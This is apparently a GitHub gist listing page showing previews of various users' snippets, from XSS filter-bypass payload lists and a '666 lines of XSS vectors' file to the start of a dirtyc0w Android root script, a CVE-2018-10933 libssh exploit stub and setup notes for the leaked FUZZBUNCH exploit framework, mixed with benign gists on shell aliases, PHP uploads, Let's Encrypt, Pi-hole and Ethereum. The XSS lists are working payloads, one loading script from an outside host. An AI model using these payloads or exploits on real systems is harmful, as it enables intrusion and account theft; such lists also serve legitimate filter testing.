Skip to content

Instantly share code, notes, and snippets.

View tomahock's full-sized avatar

João Pina tomahock

240 followers · 54 following
View GitHub Profile
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active May 1, 2024 03:25
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@Arinerron
Arinerron / root.sh
Last active March 7, 2024 09:24
"Root" via dirtyc0w privilege escalation exploit (automation script) / Android (32 bit)
#!/bin/bash
# Give the usual warning.
clear;
echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds...";
sleep 10;
clear;
# Download and extract exploit files.
echo "[INFO] Downloading exploit files from GitHub...";
@JohannesHoppe
JohannesHoppe / 666_lines_of_XSS_vectors.html
Created May 20, 2013 13:38
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@mlosapio
mlosapio / CVE-2018-10933-test
Last active February 3, 2024 18:50
#!/usr/bin/env python
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# untested CVE-2018-10933
import sys, paramiko
import logging
username = sys.argv[1]
hostname = sys.argv[2]
command = sys.argv[3]
@graceavery
graceavery / harryPotterAliases
Last active May 10, 2023 02:51
bash aliases for Harry Potter enthusiasts
alias accio=wget
alias avadaKedavra='rm -f'
alias imperio=sudo
alias priorIncantato='echo `history |tail -n2 |head -n1` | sed "s/[0-9]* //"'
alias stupefy='sleep 5'
alias wingardiumLeviosa=mv
alias sonorus='set -v'
alias quietus='set +v'
@umidjons
umidjons / files-array-normalize.md
Created March 31, 2014 14:35
Normalize $_FILES array when uploading multiple files (from php.net)

Normalize $_FILES array when uploading multiple files

When uploading multiple files, the $_FILES variable is created in the form:

Array
(
    [name] => Array
        (
            [0] => foo.txt
@renchap
renchap / README.md
Last active October 12, 2022 17:14
One-line certificate generation/renews with Letsencrypt and nginx

Prerequisites : the letsencrypt CLI tool

This method allows your to generate and renew your Lets Encrypt certificates with 1 command. This is easily automatable to renew each 60 days, as advised.

You need nginx to answer on port 80 on all the domains you want a certificate for. Then you need to serve the challenge used by letsencrypt on /.well-known/acme-challenge. Then we invoke the letsencrypt command, telling the tool to write the challenge files in the directory we used as a root in the nginx configuration.

I redirect all HTTP requests on HTTPS, so my nginx config looks like :

server {
@thomhastings
thomhastings / INSTALL.md
Last active September 29, 2022 05:33

Notes on Shadow Brokers EQGRP-LiT

credit: @GossiTheDog: "If you want to setup FUZZBUNCH (the Equation exploit framework) you need Win7 VM + Python 2.6 + Pywin 2.6, then python fb.py for shell"
h/t @x0rz @DEYCrypt @hackerfantastic

HOW 2 SETUP + INSTALL FUZZBUNCH & DANDERSPRITZ

context: https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation
writeup: https://www.trustedsec.com/blog/equation-group-dump-analysis-full-rce-win7-fully-patched-cobalt-strike/
decrypted files: https://github.com/x0rz/EQGRP_Lost_in_Translation

@andrepcg
andrepcg / dns.md
Created June 12, 2019 09:14
Usar Pi-Hole em todos os devices da rede (excepto box IPTV da vodafone)
  1. Activar servidor DHCP no Pi-Hole
  2. Criar ficheiro /etc/dnsmasq.d/03-vodafone.conf
  3. Adicionar a seguinte configuração ao ficheiro
dhcp-host=<MAC ADDRESS DA TV BOX>,set:vodafone
dhcp-option=tag:vodafone,option:dns-server,<IP DO ROUTER DA VODAFONE>

Agora a Box continua a funcionar porque usa o DNS que o router da Vodafone lhe dá e todos os restantes dispositivos na rede utilizam o DNS anunciado pelo servidor DHCP que é o do Pi-Hole

@drandreaskrueger
drandreaskrueger / ethereum_debian8.txt
Last active April 5, 2022 07:00
Debian 8 - ethereum and eth-dev-tools - installation manual
#
# Ethereum and eth-dev-tools: Debian 8
#
# rev 9
#
# started midsummer 2016-06-21 Andreas Krueger
# https://github.com/drandreaskrueger
# https://twitter.com/drandreaskruger
# please contact me with improvements, thanks.
#